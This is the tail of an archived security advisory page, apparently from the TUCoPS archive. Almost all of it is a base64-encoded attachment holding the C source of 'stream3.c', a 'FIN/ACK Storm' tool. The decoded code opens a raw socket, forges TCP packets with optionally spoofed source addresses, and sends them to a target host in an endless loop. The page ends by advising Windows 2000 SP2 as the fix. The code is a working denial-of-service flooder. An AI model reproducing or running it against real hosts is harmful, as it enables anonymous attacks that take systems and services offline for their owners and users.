	ID0gcmFuZG9tKCk7CiAgICBpZighc3JjcG9ydClzcmNwb3J0ID0gcmFuZCgpOwoKCiAgICBwYWNr

	ZXQudGNwLnRoX3dpbiAgICAgICAgICAgPSBodG9ucygxNjM4NCk7CiAgICBwYWNrZXQudGNwLnRo

	X3NlcSAgICAgICAgICAgPSByYW5kb20oKTsKICAgIHBhY2tldC50Y3AudGhfYWNrICAgICAgICAg

	ICA9IDA7CiAgICBwYWNrZXQudGNwLnRoX29mZiAgICAgICAgICAgPSA1OwogICAgcGFja2V0LnRj

	cC50aF91cnAgICAgICAgICAgID0gMDsKICAgIHBhY2tldC50Y3AudGhfYWNrIAkJPSByYW5kKCk7

	CiAgICBwYWNrZXQudGNwLnRoX2ZsYWdzIAk9IFRIX0FDS3xUSF9GSU47CiAgICBwYWNrZXQudGNw

	LnRoX3Nwb3J0IAk9IGh0b25zKHNyY3BvcnQpOwogICAgcGFja2V0LnRjcC50aF9kcG9ydCAgICAg

	ICAgID0gaHRvbnMoZHN0cG9ydCk7CiAgICBja3N1bS0+cHNldWRvLmRhZGRyICAgICAgICAgID0g

	ZHN0YWRkcjsKICAgIGNrc3VtLT5wc2V1ZG8uc2FkZHIJCSA9IHNyY2FkZHI7CiAgICBja3N1bS0+

	cHNldWRvLm1ieiAgICAgICAgICAgID0gMDsKICAgIGNrc3VtLT5wc2V1ZG8ucHRjbCAgICAgICAg

	ICAgPSBJUFBST1RPX1RDUDsKICAgIGNrc3VtLT5wc2V1ZG8udGNwbCAgICAgICAgICAgPSBodG9u

	cyhzaXplb2Yoc3RydWN0IHRjcF9oZHIpKTsKIAogICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAg

	ICAgID0gaW5fY2tzdW0oKHZvaWQgKilja3N1bSwgc2l6ZW9mKHN0cnVjdCBja3N1bSkpOwoKICAg

	IHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7CiAgICBwYWNrZXQuaXAuaXBfdiAgICAg

	ICAgICAgICAgPSA0OwogICAgcGFja2V0LmlwLmlwX3AgICAgICAgICAgICAgID0gSVBQUk9UT19U

	Q1A7CiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAgPSAweDA4OwogICAgcGFja2V0Lmlw

	LmlwX2lkICAgICAgICAgICAgID0gcmFuZCgpOwogICAgcGFja2V0LmlwLmlwX2xlbiAgICAgICAg

	ICAgID0gRklYKHNpemVvZihwYWNrZXQpKTsKICAgIHBhY2tldC5pcC5pcF9vZmYgICAgICAgICAg

	ICA9IDA7CiAgICBwYWNrZXQuaXAuaXBfdHRsICAgICAgICAgICAgPSAyNTU7CiAgICBwYWNrZXQu

	aXAuaXBfZHN0CQk9IGRzdGFkZHI7CiAgICBwYWNrZXQuaXAuaXBfc3JjICAgICAJPSBzcmNhZGRy

	OwogICAgcGFja2V0LmlwLmlwX3N1bSAgICAgICAgIAk9IDA7CiAgICBwYWNrZXQuaXAuaXBfc3Vt

	ICAgICAgICAgICAgPSBpbl9ja3N1bSgodm9pZCAqKSZwYWNrZXQuaXAsIDIwKTsKCiAgICBzX2lu

	LnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOwogICAgc19pbi5zaW5fcG9ydCAgICAg

	ICAgICAgICAgID0gaHRvbnMoZHN0cG9ydCk7CiAgICBzX2luLnNpbl9hZGRyLnNfYWRkcgk9IGRz

	dGFkZHI7CiAgICBmb3IoaT0wOzsrK2kpIHsJCQkvKiB3ZSBkbyBub3Qgd2FudCB0byBjaGFuZ2Ug

	cGFja2V0IGF0IGFsbCAqLwogICAgICAgaWYgKHNlbmR0byhzb2NrLCAmcGFja2V0LCBzaXplb2Yo

	cGFja2V0KSwgMCwgKHN0cnVjdCBzb2NrYWRkciAqKSZzX2luLCBzaXplb2Yoc19pbikpIDwgMCkK

	ICAgICAgICAgIHBlcnJvcigic2VuZHRvKCkiKTsKICAgIH0KfQoKaW50IG1haW4oaW50IGFyZ2Ms

	IGNoYXIgKmFyZ3ZbXSkKewogICAgaW50IG9uID0gMTsKCiAgICBwcmludGYoInN0cmVhbTMuYyB2

	MC4xIC0gRklOL0FDSyBTdG9ybVxuIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1XG4iKTsKCiAgICBp

	ZiAoYXJnYyA8IDEpIGV4aXQoLTMpOwogICAgaWYgKGFyZ2MgPCAzIHx8IGFyZ2MgPiA1KQogICAg

	ICAgdXNhZ2UoYXJndlswXSk7CgogICAgc3JhbmQodGltZShOVUxMKSk7IAkJCS8qIHdlIG5lZWRu

	J3QgdG9vIG11Y2ggcmFuZG9tbmVzcyAqLwoKICAgIGRzdGFkZHIgICAgID0gbG9va3VwKGFyZ3Zb

	MV0pOwogICAgZHN0cG9ydCAgICAgPSBhdG9pKGFyZ3ZbMl0pOwoKICAgIGlmICghZHN0YWRkciB8

	fCAhZHN0cG9ydCkgdXNhZ2UoYXJndlswXSk7CgogICAgaWYoYXJnYyA+IDMpIHNyY2FkZHIgPSBs

	b29rdXAoYXJndlszXSk7CiAgICBpZihhcmdjID4gNCkgc3JjcG9ydCA9IGF0b2koYXJndls0XSk7

	CgogICAgaWYgKChzb2NrID0gc29ja2V0KFBGX0lORVQsIFNPQ0tfUkFXLCBJUFBST1RPX1JBVykp

	IDwgMCkgewogICAgICAgcGVycm9yKCJzb2NrZXQoKSIpOwogICAgICAgZXhpdCgtMSk7CiAgICB9

	CgogICAgaWYgKHNldHNvY2tvcHQoc29jaywgSVBQUk9UT19JUCwgSVBfSERSSU5DTCwgKGNoYXIg

	Kikmb24sIHNpemVvZihvbikpIDwgMCkgewogICAgICAgcGVycm9yKCJzZXRzb2Nrb3B0KCkiKTsK

	ICAgICAgIGV4aXQoLTIpOwogICAgfQoKICAgIHByaW50ZigiU3RhcnRpbmciKTsgCiAgICBmZmx1

	c2goc3Rkb3V0KTsKCiAgICBmbG9vZGVyKCk7CgogICAgcmV0dXJuIDA7Cn0K

	

	------------A75016D2F7EDAB0--

	

	

	

SOLUTION

	Apply Windows 2000 SP2


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH